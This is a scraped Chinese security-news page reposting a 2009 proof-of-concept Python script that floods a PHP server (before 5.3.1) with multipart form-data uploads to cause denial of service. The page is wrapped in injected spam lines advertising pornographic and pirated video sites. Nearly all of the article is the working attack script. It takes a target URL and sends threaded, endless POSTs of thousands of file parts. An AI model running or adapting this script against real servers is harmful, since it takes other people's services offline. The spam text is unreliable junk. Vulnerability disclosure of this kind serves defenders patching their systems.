成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

PHP 5.3.1版本之前的拒絕服務攻擊漏洞(附測試代碼)

作者:佚名
安全 漏洞
拒絕服務##遠程攻擊##立即處理[msg]Code:# # PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 # Bogdan Calin (bogdan@acunetix.com)
Code:
# 
# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 
# Bogdan Calin (bogdan@acunetix.com) 
# 
import httplib, urllib, sys, string, threading 
from string import replace 
from urlparse import urlparse 

def usage(): 
        print "****************************************************************************" 
        print " PHP MultiPart Form-Data Denial of Service proof of concept" 
        print " Bogdan Calin (bogdan@acunetix.com)" 
        print "" 
        print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]" 
        print ""         
        print "  [number_of_threads] - optional, default 10"         
        print "  [number_of_files] - optional, default 15000"                 
        print "  [data] - content of the files, by default it will create files containing" 
        print "           the string " 
        print ""                 
        print " Example: php_mpfd_dos.pyhttp://ubuntu/index.php"         
        print "****************************************************************************" 
         
class PhpMPFDDosThread ( threading.Thread ): 
        # Override Thread's __init__ method to accept the parameters needed: 
        def __init__ ( self, host, path, files ):         
                self.host = host 
                self.path = path 
                self.files = files 
                threading.Thread.__init__ ( self )                 

        # run in loop 
        def run(self): 
                while(1): 
                        try: 
                                self.post_data() 
                        except: 
                                print "*", 
                 
        # post multipart_formdata         
        def post_data(self):         
            content_type, body = self.encode_multipart_formdata() 
            h = httplib.HTTPConnection(self.host) 
            headers = { 
                'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)', 
                'Accept': '*/*', 
                'Content-Type': content_type 
                } 
            h.request('POST', self.path, body, headers) 
            print ".", 

        # encode multipart_formdata 
        def encode_multipart_formdata(self): 
                """ 
                adapted fromhttp://code.activestate.com/recipes/146306/ 
                files is a sequence of (name, filename, value) elements for data to be uploaded as files 
                Return (content_type, body) ready for httplib.HTTP instance 
                """ 
                BOUNDARY = '----------PHP_MPFD_DOS' 
                CRLF = '\r\n' 
                L = [] 
                for (key, filename, value) in self.files: 
                L.append('--' + BOUNDARY) 
                L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) 
                L.append('Content-Type: application/octet-stream') 
                L.append('') 
                L.append(value) 
                L.append('--' + BOUNDARY + '--') 
                L.append('') 
                body = CRLF.join(L) 
                content_type = 'multipart/form-data; boundary=%s' % BOUNDARY 
                return content_type, body 

def main():     
        if len(sys.argv)<=1: 
                usage() 
                sys.exit() 

        # default values 
        number_of_threads = 10 
        number_of_files = 15000 
        data = "" 
         
        if len(sys.argv)>2: 
                number_of_threads = int(sys.argv[2]) 

        if len(sys.argv)>3: 
                number_of_files = int(sys.argv[3]) 

        if len(sys.argv)>4: 
                data = sys.argv[4]         
         
        url = sys.argv[1] 
        print "[-] target: " + url 

        # parse target url 
        up = urlparse(url) 
        host = up.netloc 
        path = up.path 

        # prepare files 
        files = [] 
        for i in range(0, number_of_files): 
                files.append(('fu[]', 'f'+str(i), data)) 
         
        # start the threads 
        for x in xrange ( number_of_threads ): 
                PhpMPFDDosThread(host, path, files).start() 

if __name__ == '__main__': 
    main()

【編輯推薦】

  1. Windows下PHP+MySQL+IIS安全平臺III 變態配置
  2. php應用程序安全防范技術研究
責任編輯:安泉 來源: 黑客防線
PHP漏洞
相關推薦

2009-07-12 16:50:08

2010-10-08 12:21:22

2010-10-09 14:59:30

2011-03-03 11:26:09

2009-08-29 16:45:27

2009-10-22 11:28:38

2009-10-24 10:29:56

2010-10-11 12:29:52

2012-08-20 10:15:44

2015-08-21 10:11:25

2010-01-15 11:21:12

2009-07-12 16:24:57

2011-08-11 09:02:58

2009-10-27 14:17:49

2024-09-25 15:32:23

2011-12-29 09:21:09

TomcatHashtable

2025-06-27 09:02:08

2009-07-19 21:53:22

2010-10-09 14:15:47

2009-10-29 13:24:41

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲日韩视频 | 一区二区三区欧美 | 欧美成人一区二区三区 | h片在线观看网站 | 亚洲电影一区 | 欧美一区二区三区在线观看 | 久久久国产一区二区三区 | 亚洲欧美中文日韩在线 | 精品1区2区 | 欧美激情在线播放 | 久久久久久成人网 | 狠狠躁天天躁夜夜躁婷婷老牛影视 | 国产丝袜一区二区三区免费视频 | 久久不卡 | 红色av社区 | 日本电影免费完整观看 | 久久精品一区二区 | 成人在线视频免费看 | 成人免费看片 | 中文在线一区 | 欧美日韩在线成人 | 久久久精品一区二区 | 久久手机在线视频 | 国产午夜精品一区二区三区嫩草 | 午夜精品一区二区三区三上悠亚 | 亚洲欧美在线视频 | 91国产精品| 国产超碰人人爽人人做人人爱 | 国产成人网 | 精品国产欧美一区二区三区不卡 | 欧美日韩综合精品 | 日韩一区在线观看视频 | 色精品视频 | 亚洲不卡av在线 | 久久久久国产一区二区三区 | 亚洲综合在线视频 | 成人国产在线视频 | 天堂国产 | 在线亚洲电影 | 一区二区三区在线 | 国产亚洲区 |